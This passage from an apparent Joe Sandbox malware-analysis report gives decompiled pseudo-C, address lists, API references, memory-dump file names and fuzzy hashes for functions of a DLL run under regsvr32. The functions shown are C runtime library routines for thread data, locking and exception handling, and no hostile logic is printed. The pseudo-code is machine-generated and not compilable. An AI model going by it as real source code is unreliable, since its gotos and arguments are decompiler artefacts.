				if (_t27 == 0) goto 0x2b0709eb;
				asm("lock dec dword [ebx]");
				if (_t27 != 0) goto 0x2b0709eb;
				if (_a8 == 0x2b0c78c0) goto 0x2b0709eb;
				free(??);
				_t32 =  *0x2b0c7cf0; // 0xbe1d30
				 *((long long*)(_t42 + 0xb8)) = _t32;
				_t33 =  *0x2b0c7cf0; // 0xbe1d30
				_a8 = _t33;
				asm("lock inc dword [eax]");
				E00007FFD7FFD2B0695B8();
				if (_a8 != 0) goto 0x2b070a24;
				return E00007FFD7FFD2B0672D8(_a8 + 0x20, _a8, _t48);
			}

0x7ffd2b070978
0x7ffd2b070978
0x7ffd2b070982
0x7ffd2b070987
0x7ffd2b070996
0x7ffd2b0709a0
0x7ffd2b0709a9
0x7ffd2b0709b0
0x7ffd2b0709b6
0x7ffd2b0709bd
0x7ffd2b0709c2
0x7ffd2b0709c9
0x7ffd2b0709cb
0x7ffd2b0709ce
0x7ffd2b0709d0
0x7ffd2b0709d3
0x7ffd2b0709e4
0x7ffd2b0709e6
0x7ffd2b0709eb
0x7ffd2b0709f2
0x7ffd2b0709f9
0x7ffd2b070a00
0x7ffd2b070a05
0x7ffd2b070a12
0x7ffd2b070a1a
0x7ffd2b070a31

APIs

_getptd.LIBCMT ref: 00007FFD2B070982

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

_lock.LIBCMT ref: 00007FFD2B0709B0
free.LIBCMT ref: 00007FFD2B0709E6
_amsg_exit.LIBCMT ref: 00007FFD2B070A1F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _amsg_exit$_getptd_lockfree
String ID:
API String ID: 2148533958-0
Opcode ID: 2ef4612454d6d75ca460afe0c0a07bbd2284739c945846a1227e11925fd45e10
Instruction ID: 03da00220238a7c6e0e8c69a1c7551a7618fa68317223a2a0e634fde56b8d5ca
Opcode Fuzzy Hash: 2ef4612454d6d75ca460afe0c0a07bbd2284739c945846a1227e11925fd45e10
Instruction Fuzzy Hash: 8F116032B0B64285FA969B41DE617B97360FF45740F080135DA4D033B6DFACE440E390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B067DF8 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32(?,?,?,?,00007FFD2B065A4A), ref: 00007FFD2B067E07
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD2B065A4A), ref: 00007FFD2B069563
free.LIBCMT ref: 00007FFD2B06956C
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD2B065A4A), ref: 00007FFD2B069593

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: CriticalDeleteSection$Freefree
String ID:
API String ID: 1250194111-0
Opcode ID: 2a3604f3cee8a248475c699c614c92f714952c2453d3a69da133fa28b9de4b29
Instruction ID: db70e27dc43f524d9335ddfd397a001aa7ef9324d25a978625727e2e612bad28
Opcode Fuzzy Hash: 2a3604f3cee8a248475c699c614c92f714952c2453d3a69da133fa28b9de4b29
Instruction Fuzzy Hash: 8411B631F0AA41CEEB1A8F15ED652386360EF4A754F480630D65E066F4CF7CE8419781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0714A0 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00007FFD7FFD2B0714A0(void* __ecx, void* __eflags, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r8, long long _a8) {
				void* __rdi;
				void* _t13;
				void* _t14;
				intOrPtr* _t26;
				intOrPtr* _t31;
				intOrPtr* _t36;

				_t38 = __rbp;
				_t37 = __rsi;
				_t35 = __rdx;
				_t33 = __rcx;
				_t26 = __rax;
				_a8 = __rbx;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, __rax, __rcx, __rsi, __r8);
				_t36 = _t26;
				_t2 = _t35 + 0xf; // 0x10
				E00007FFD7FFD2B06796C(__rbx, __rcx, __rdx, _t36, __rsi, __rbp);
				_t31 = _t26;
				if (_t26 != 0) goto 0x2b0714d6;
				E00007FFD7FFD2B067698(_t26);
				 *_t26 = 0xc;
				goto 0x2b071531;
				E00007FFD7FFD2B071298(_t2, 1, 0, _t26, _t33, _t36, _t37);
				_t13 = E00007FFD7FFD2B070978(_t2, 1, 0, _t26, _t31, _t33, _t37, _t38);
				 *_t31 =  *((intOrPtr*)(_t36 + 0xc0));
				 *((long long*)(_t31 + 8)) =  *((intOrPtr*)(_t36 + 0xb8));
				E00007FFD7FFD2B0696D8();
				_t14 = E00007FFD7FFD2B070F94(_t13,  *_t31, __r8);
				E00007FFD7FFD2B0695B8();
				E00007FFD7FFD2B0696D8();
				asm("lock inc dword [eax]");
				E00007FFD7FFD2B0695B8();
				return _t14;
			}

0x7ffd2b0714a0
0x7ffd2b0714a0
0x7ffd2b0714a0
0x7ffd2b0714a0
0x7ffd2b0714a0
0x7ffd2b0714a0
0x7ffd2b0714aa
0x7ffd2b0714af
0x7ffd2b0714b7
0x7ffd2b0714ba
0x7ffd2b0714bf
0x7ffd2b0714c5
0x7ffd2b0714c7
0x7ffd2b0714cc
0x7ffd2b0714d4
0x7ffd2b0714d6
0x7ffd2b0714db
0x7ffd2b0714e7
0x7ffd2b0714f1
0x7ffd2b0714fa
0x7ffd2b071503
0x7ffd2b07150e
0x7ffd2b07151a
0x7ffd2b071524
0x7ffd2b071529
0x7ffd2b07153b

APIs

_getptd.LIBCMT ref: 00007FFD2B0714AA

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

Part of subcall function 00007FFD2B06796C: Sleep.KERNEL32(?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B0679B1

_errno.LIBCMT ref: 00007FFD2B0714C7
_lock.LIBCMT ref: 00007FFD2B0714FA
_lock.LIBCMT ref: 00007FFD2B07151A

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _lock$Sleep_amsg_exit_errno_getptd
String ID:
API String ID: 511150081-0
Opcode ID: 174e7759716eb80b6c882189a588989c37476cf2cfdcd891cc3ee00f0d74f4a7
Instruction ID: 78f5e7cb65a400b29481f5cae4b5c8a8cc9294e61d3924761c2793a42710eae7
Opcode Fuzzy Hash: 174e7759716eb80b6c882189a588989c37476cf2cfdcd891cc3ee00f0d74f4a7
Instruction Fuzzy Hash: 6C019621B076028AF6466B71D9627BC6251EF46780F444130EB0D173E7DE7CE850A391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B071298 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00007FFD7FFD2B071298(void* __ecx, void* __edx, void* __eflags, void* __rax, void* __rcx, void* __rdi, void* __rsi) {
				void* __rbx;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				intOrPtr _t29;
				void* _t32;

				_t22 = __rax;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, __rax, __rcx, __rsi, _t32);
				if (( *0x2b0c7df0 &  *(_t22 + 0xc8)) == 0) goto 0x2b0712cc;
				if ( *((long long*)(_t22 + 0xc0)) == 0) goto 0x2b0712cc;
				E00007FFD7FFD2B067F5C( *(_t22 + 0xc8),  *((long long*)(_t22 + 0xc0)), _t22, __rcx, __rsi, _t32);
				_t25 =  *((intOrPtr*)(_t22 + 0xc0));
				goto 0x2b0712f7;
				E00007FFD7FFD2B0696D8();
				_t6 = _t25 + 0xc0; // 0xc0
				_t29 =  *0x2b0c8220; // 0x7ffd2b0c80c0
				E00007FFD7FFD2B071240(_t22, _t6, _t29, __rdi, __rsi, _t32);
				_t26 = _t22;
				E00007FFD7FFD2B0695B8();
				if (_t26 != 0) goto 0x2b071304;
				_t7 = _t26 + 0x20; // 0x20
				return E00007FFD7FFD2B0672D8(_t7, _t26, _t32);
			}

0x7ffd2b071298
0x7ffd2b07129e
0x7ffd2b0712b2
0x7ffd2b0712bc
0x7ffd2b0712be
0x7ffd2b0712c3
0x7ffd2b0712ca
0x7ffd2b0712d1
0x7ffd2b0712d7
0x7ffd2b0712de
0x7ffd2b0712e5
0x7ffd2b0712ea
0x7ffd2b0712f2
0x7ffd2b0712fa
0x7ffd2b0712fc
0x7ffd2b07130c

APIs

_getptd.LIBCMT ref: 00007FFD2B07129E

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

_getptd.LIBCMT ref: 00007FFD2B0712BE
_lock.LIBCMT ref: 00007FFD2B0712D1
_amsg_exit.LIBCMT ref: 00007FFD2B0712FF

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: 61de52a570ce59d3dd549c6722c005d8cba93f103870302328cc2ce3a9da2817
Instruction ID: c7a36bbc09f474950eb86567a3d691d5758ee1ff3eae440665f264c782d6d444
Opcode Fuzzy Hash: 61de52a570ce59d3dd549c6722c005d8cba93f103870302328cc2ce3a9da2817
Instruction Fuzzy Hash: 6AF04F21B0B14386FA1A6B508E62BF85260EF5A700F081134EE0D472F6CF9CB895F391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B080624 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00007FFD7FFD2B080624(void* __ecx, void* __edi, void* __eflags, void* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				intOrPtr _t50;
				void* _t52;
				void* _t72;
				intOrPtr _t73;
				char _t85;
				void* _t102;
				intOrPtr _t104;
				intOrPtr* _t108;
				signed int* _t125;
				void* _t127;
				void* _t130;
				long long* _t145;
				void* _t146;

				_t102 = __rax;
				_t72 = __edi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t130 = __r9;
				_t146 = __r8;
				_t127 = __rdx;
				_t108 = __rcx;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, __rax, __rcx, __rdx, __r8);
				_t125 = _a40;
				r8d = 0x80000029;
				r9d = 0x80000026;
				r14d = 1;
				if ( *((intOrPtr*)(_t102 + 0x2c0)) != 0) goto 0x2b0806ad;
				if ( *__rcx == 0xe06d7363) goto 0x2b0806ad;
				if ( *__rcx != r8d) goto 0x2b080692;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x2b080692;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x2b0806ad;
				if ( *__rcx == r9d) goto 0x2b0806ad;
				if (( *_t125 & 0x1fffffff) - 0x19930522 < 0) goto 0x2b0806ad;
				if ((_t125[9] & r14b) != 0) goto 0x2b08082d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x2b08074b;
				if (_t125[1] == 0) goto 0x2b08082d;
				_t85 = _a48;
				if (_t85 != 0) goto 0x2b08082d;
				if (_t85 == 0) goto 0x2b080714;
				if ( *__rcx != r9d) goto 0x2b080714;
				_t50 = E00007FFD7FFD2B07EC64(_t102, __rcx, _t125, __r9, __rdx, __r9,  *((intOrPtr*)(__r8 + 0xf8)));
				if (_t50 - 0xffffffff < 0) goto 0x2b0806f9;
				if (_t50 - _t125[1] < 0) goto 0x2b0806fe;
				E00007FFD7FFD2B072484(_t102);
				r9d = _t50;
				_t52 = E00007FFD7FFD2B07EF84( *_t125 & 0x1fffffff, _t50 - _t125[1], __rdx, _t130, _t130, _t125);
				goto 0x2b08082d;
				if (_t52 == 0) goto 0x2b080738;
				if ( *_t108 != r8d) goto 0x2b080738;
				_t73 =  *((intOrPtr*)(_t108 + 0x38));
				if (_t73 - 0xffffffff < 0) goto 0x2b08072a;
				if (_t73 - _t125[1] < 0) goto 0x2b08072f;
				E00007FFD7FFD2B072484(_t102);
				r9d = _t73;
				goto 0x2b080704;
				E00007FFD7FFD2B07E624(_t72, _t108, _t127, _t130, _t127, _t125);
				goto 0x2b08082d;
				if (_t125[3] != 0) goto 0x2b08077f;
				if (( *_t125 & 0x1fffffff) - 0x19930521 < 0) goto 0x2b08082d;
				if (_t125[8] == 0) goto 0x2b080774;
				E00007FFD7FFD2B07E4B4(_t102);
				goto 0x2b080776;
				if (_t102 + _t125[8] == 0) goto 0x2b08082d;
				if ( *_t108 != 0xe06d7363) goto 0x2b0807f4;
				if ( *((intOrPtr*)(_t108 + 0x18)) - 3 < 0) goto 0x2b0807f4;
				if ( *((intOrPtr*)(_t108 + 0x20)) - 0x19930522 <= 0) goto 0x2b0807f4;
				_t104 =  *((intOrPtr*)(_t108 + 0x30));
				if ( *((intOrPtr*)(_t104 + 8)) == 0) goto 0x2b0807b2;
				E00007FFD7FFD2B07E4CC(_t104);
				_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x30)) + 8)) + _t104;
				goto 0x2b0807b5;
				r11d = 0;
				if (_t145 == 0) goto 0x2b0807f4;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t125;
				 *_t145();
				goto 0x2b080830;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t125;
				E00007FFD7FFD2B080130(_t50,  *_t125 & 0x1fffffff, _t72, _t108, _t108, _t127, _t146, _t130);
				return r14d;
			}

0x7ffd2b080624
0x7ffd2b080624
0x7ffd2b080624
0x7ffd2b080629
0x7ffd2b08062e
0x7ffd2b08063c
0x7ffd2b08063f
0x7ffd2b080642
0x7ffd2b080645
0x7ffd2b080648
0x7ffd2b08064d
0x7ffd2b080661
0x7ffd2b080667
0x7ffd2b08066d
0x7ffd2b080673
0x7ffd2b08067b
0x7ffd2b080680
0x7ffd2b080686
0x7ffd2b080690
0x7ffd2b080695
0x7ffd2b0806a1
0x7ffd2b0806a7
0x7ffd2b0806b2
0x7ffd2b0806bc
0x7ffd2b0806c2
0x7ffd2b0806ca
0x7ffd2b0806d3
0x7ffd2b0806d8
0x7ffd2b0806e8
0x7ffd2b0806f2
0x7ffd2b0806f7
0x7ffd2b0806f9
0x7ffd2b0806fe
0x7ffd2b08070a
0x7ffd2b08070f
0x7ffd2b080716
0x7ffd2b08071b
0x7ffd2b08071d
0x7ffd2b080723
0x7ffd2b080728
0x7ffd2b08072a
0x7ffd2b080733
0x7ffd2b080736
0x7ffd2b080741
0x7ffd2b080746
0x7ffd2b08074f
0x7ffd2b08075a
0x7ffd2b080764
0x7ffd2b080766
0x7ffd2b080772
0x7ffd2b080779
0x7ffd2b080785
0x7ffd2b08078b
0x7ffd2b080794
0x7ffd2b080796
0x7ffd2b08079e
0x7ffd2b0807a0
0x7ffd2b0807ad
0x7ffd2b0807b0
0x7ffd2b0807b2
0x7ffd2b0807b8
0x7ffd2b0807c8
0x7ffd2b0807d7
0x7ffd2b0807e6
0x7ffd2b0807ea
0x7ffd2b0807ef
0x7ffd2b0807f2
0x7ffd2b080802
0x7ffd2b080811
0x7ffd2b08081f
0x7ffd2b080823
0x7ffd2b080828
0x7ffd2b080848

APIs

_getptd.LIBCMT ref: 00007FFD2B080648

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

Strings

csm, xrefs: 00007FFD2B08077F
csm, xrefs: 00007FFD2B080675

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _amsg_exit_getptd
String ID: csm$csm
API String ID: 4217099735-3733052814
Opcode ID: 2ae13b9a017ee306c96eda2d01e27949c1ec616db7b794437f9e586f3de020f0
Instruction ID: 43e8e1546c53857c55509241fd5397a2a03af149baa2fc70c850d7347377a49e
Opcode Fuzzy Hash: 2ae13b9a017ee306c96eda2d01e27949c1ec616db7b794437f9e586f3de020f0
Instruction Fuzzy Hash: E151DE32F0A6428AE7618F119A60B797690FB42B84F048235DA4D477A5DF7CE590EF81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B080FAD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD2B080FAD(long long __rcx, void* __rdx) {
				void* __rbp;
				void* _t38;
				intOrPtr _t63;
				void* _t69;
				void* _t71;

				 *((long long*)(__rdx + 0x68)) = __rcx;
				 *((long long*)(__rdx + 0x58)) = __rcx;
				 *((long long*)(__rdx + 0x28)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x58))));
				 *((intOrPtr*)(__rdx + 0x20)) = 0;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)))) != 0xe06d7363) goto 0x2b081029;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x18)) != 4) goto 0x2b081029;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x20)) == 0x19930520) goto 0x2b08100d;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x20)) == 0x19930521) goto 0x2b08100d;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x20)) != 0x19930522) goto 0x2b081029;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x28)) !=  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0xc8)) + 0x28))) goto 0x2b081029;
				 *((intOrPtr*)(__rdx + 0x20)) = 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)))) != 0xe06d7363) goto 0x2b081090;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x18)) != 4) goto 0x2b081090;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x20)) == 0x19930520) goto 0x2b081066;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x20)) == 0x19930521) goto 0x2b081066;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x28)) + 0x20)) != 0x19930522) goto 0x2b081090;
				_t63 =  *((intOrPtr*)(__rdx + 0x28));
				if ( *((long long*)(_t63 + 0x30)) != 0) goto 0x2b081090;
				E00007FFD7FFD2B067F5C(_t38,  *((long long*)(_t63 + 0x30)), _t63,  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0xc8)) + 0x28)), _t69, _t71);
				 *((intOrPtr*)(_t63 + 0x2c0)) = 1;
				 *((intOrPtr*)(__rdx + 0x20)) = 1;
				 *((intOrPtr*)(__rdx + 0x30)) = 1;
				goto 0x2b081097;
				 *((intOrPtr*)(__rdx + 0x30)) = 0;
				return  *((intOrPtr*)(__rdx + 0x30));
			}

0x7ffd2b080fb6
0x7ffd2b080fba
0x7ffd2b080fc5
0x7ffd2b080fc9
0x7ffd2b080fda
0x7ffd2b080fe4
0x7ffd2b080ff1
0x7ffd2b080ffe
0x7ffd2b08100b
0x7ffd2b081020
0x7ffd2b081022
0x7ffd2b081033
0x7ffd2b08103d
0x7ffd2b08104a
0x7ffd2b081057
0x7ffd2b081064
0x7ffd2b081066
0x7ffd2b08106f
0x7ffd2b081071
0x7ffd2b081076
0x7ffd2b081080
0x7ffd2b081087
0x7ffd2b08108e
0x7ffd2b081090
0x7ffd2b08109f

APIs

_getptd.LIBCMT ref: 00007FFD2B081071

Strings

csm, xrefs: 00007FFD2B08102D
csm, xrefs: 00007FFD2B080FD4

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm$csm
API String ID: 3186804695-3733052814
Opcode ID: abc3af286f30aed5d5a8bed9763bb470f1ed2f399841bf4c9372b2c81c7bde87
Instruction ID: 6ede9e37085a6cd61f91ff71c1268901a5e6a44f5983fc8be4740dd9fe0b93d9
Opcode Fuzzy Hash: abc3af286f30aed5d5a8bed9763bb470f1ed2f399841bf4c9372b2c81c7bde87
Instruction Fuzzy Hash: E3316F73605B44CADB218F65D8942A83BB4FB5CB9CF461235E60D0BB64CBB5D9C0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0810AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00007FFD7FFD2B0810AD(void* __ecx, void* __eflags, void* __rax, void* __rdx, void* __rsi, void* __r8) {
				void* __rbx;
				void* __rbp;
				void* _t17;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t38;

				_t28 = __rax;
				_t18 = __ecx;
				_t38 = __rdx;
				E00007FFD7FFD2B07EA84(__ecx, __eflags, __rax, _t29,  *((intOrPtr*)(__rdx + 0x50)), __rsi, __rdx, __r8);
				if ( *((intOrPtr*)(__rdx + 0x20)) != 0) goto 0x2b08110e;
				_t30 =  *((intOrPtr*)(__rdx + 0xc8));
				if ( *_t30 != 0xe06d7363) goto 0x2b08110e;
				if ( *((intOrPtr*)(_t30 + 0x18)) != 4) goto 0x2b08110e;
				if ( *((intOrPtr*)(_t30 + 0x20)) == 0x19930520) goto 0x2b0810f6;
				if ( *((intOrPtr*)(_t30 + 0x20)) == 0x19930521) goto 0x2b0810f6;
				if ( *((intOrPtr*)(_t30 + 0x20)) != 0x19930522) goto 0x2b08110e;
				if (E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t30 + 0x20)) - 0x19930522, __rax,  *((intOrPtr*)(_t30 + 0x28))) == 0) goto 0x2b08110e;
				E00007FFD7FFD2B07F1C0(1, _t30);
				E00007FFD7FFD2B067F5C(__ecx, E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t30 + 0x20)) - 0x19930522, __rax,  *((intOrPtr*)(_t30 + 0x28))), _t28, _t30, __rsi, __r8);
				 *((long long*)(_t28 + 0xf0)) =  *((intOrPtr*)(_t38 + 0xd0));
				_t17 = E00007FFD7FFD2B067F5C(_t18, E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t30 + 0x20)) - 0x19930522, __rax,  *((intOrPtr*)(_t30 + 0x28))), _t28,  *((intOrPtr*)(_t38 + 0xd0)), __rsi, __r8);
				 *((long long*)(_t28 + 0xf8)) =  *((intOrPtr*)(_t38 + 0xd8));
				return _t17;
			}

0x7ffd2b0810ad
0x7ffd2b0810ad
0x7ffd2b0810b4
0x7ffd2b0810bb
0x7ffd2b0810c4
0x7ffd2b0810c6
0x7ffd2b0810d3
0x7ffd2b0810d9
0x7ffd2b0810e2
0x7ffd2b0810eb
0x7ffd2b0810f4
0x7ffd2b081101
0x7ffd2b081108
0x7ffd2b08110e
0x7ffd2b08111a
0x7ffd2b081121
0x7ffd2b08112d
0x7ffd2b08113a

APIs

Part of subcall function 00007FFD2B07EA84: _getptd.LIBCMT ref: 00007FFD2B07EA91
Part of subcall function 00007FFD2B07EA84: _getptd.LIBCMT ref: 00007FFD2B07EAA4

_getptd.LIBCMT ref: 00007FFD2B08110E
_getptd.LIBCMT ref: 00007FFD2B081121

Strings

csm, xrefs: 00007FFD2B0810CD

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
